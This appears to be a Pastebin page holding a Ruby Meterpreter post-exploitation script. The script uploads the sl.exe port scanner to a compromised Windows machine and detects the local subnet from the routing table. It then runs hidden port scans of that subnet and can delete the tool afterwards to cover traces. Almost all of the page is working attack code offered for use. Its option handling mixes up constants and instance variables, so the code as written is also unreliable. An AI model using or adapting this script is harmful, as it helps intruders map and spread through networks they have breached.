Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env ruby
- require 'ftools'
- ############################################################
- # This is an Meterpreter script to do a portscanning of#
- #the same network where the controled computer is #
- #using a portscanner called sl.exe #
- # #
- ############################################################
- # If netmask isn't 255.255.255.0 it must work any way #
- ############################################################
- # Tested in Win2003 and WinXP #
- ############################################################
- # Created by Augusto Pereyra aepereyra(at)gmail.com #
- ############################################################
- # Made Awesome by PodJackel, podjackel@gmail.com #
- ############################################################
- @@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu."],
- "-r" => [ true, "To set the range manualy"],
- "-a" => [ false, "For automatic lan detection and port scan"],
- "-s" => [ false, "Tool Source Path (Default: /pentest/windows-binaries/scanners/sl.exe)"],
- "-d" => [ false, "Client Destination Path (Default: %windir%\\system32\\sl.exe)"],
- "-c" => [ false, "Delete tool from host after scan"]
- )
- #Function for upload the port scanner
- def uploadtool (dst, src)
- print_status("Uploading Portscanner to target")
- #Here you can set the path where sl.exe is in owr system and Where will be wher run this tool
- #sl.exe was created by foundstone
- client.fs.file.upload_file(dst, src)
- end
- def removetool (src)
- print_status("Removing Portscanner from target")
- client.fs.file.rm(src)
- end
- #Function for network autodetection
- def auto ()
- session1 = client
- cuenta = 0
- l1 = Array.new
- rangoar = Array.new
- res = session1.sys.process.execute("route print", nil, {'Hidden' => true, 'Channelized' => true})
- while(d1 = res.channel.read)
- d1.each do |line|
- if line =~ /( 0.0.0.0)/
- l1= line.split
- res.channel.close
- end
- end
- xx= l1[3]
- sxx1 = xx.split(".")
- sxx2 = xx.split(".")
- sxx1[3]='1'
- sxx2[3]='254'
- rango1= sxx1.join(".")
- rango2= sxx2.join(".")
- rangoar[0]=rango1
- rangoar[1]=rango2
- rango= rangoar.join("-")
- return rango
- end
- end
- ####################################################################
- #Function for Port Scanning#########################################
- ####################################################################
- def portscan(iprange,path)
- print_status("Performing portscanning for IP range #{iprange}")
- session = client
- cuentah = 0
- a1 = Array.new
- session.response_timeout= 100
- res = session.sys.process.execute("#{path} -q 1000 -c 500 -h #{iprange}", nil, {'Hidden' => true, 'Channelized' => true})
- while(d = res.channel.read)
- d.each do |line|
- a1.insert(cuentah, line)
- cuentah = cuentah + 1
- res.channel.close
- end
- end
- a1.each { |v| puts v }
- end
- #####################################################################
- #This is me##########################################################
- #####################################################################
- def mysign ()
- print_status("Created by Augusto Pereyra, aepereyra at gmail.com")
- print_status("Made Awesome by PodJackel, podjackel@gmail.com")
- end
- #####################################################################
- # MAIN ############################################################
- #####################################################################
- # Parsing of Options
- range = nil
- porsc = nil
- @WinPath=client.fs.file.expand_path("%windir%\\system32\\sl.exe")
- @ToolPath="/pentest/windows-binaries/scanners/sl.exe"
- @Clean=0
- @@exec_opts.parse(args){ |opt, idx, val|
- case opt
- when "-a"
- porsc = 2
- when "-r"
- range = val
- when "-d"
- WinPath = val
- when "-s"
- ToolPath = val
- when "-c"
- Clean = 1
- end
- }
- if range != nil && porsc != 2
- mysign()
- uploadtool(WinPath, ToolPath)
- portscan(range,WinPath)
- if Clean==1 then
- removetool(WinPath)
- end
- elsif porsc == 2
- mysign()
- uploadtool(WinPath, ToolPath)
- range= auto()
- portscan(range,WinPath)
- if Clean==1 then
- removetool(WinPath)
- end
- else
- mysign()
- print( @@exec_opts.usage)
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement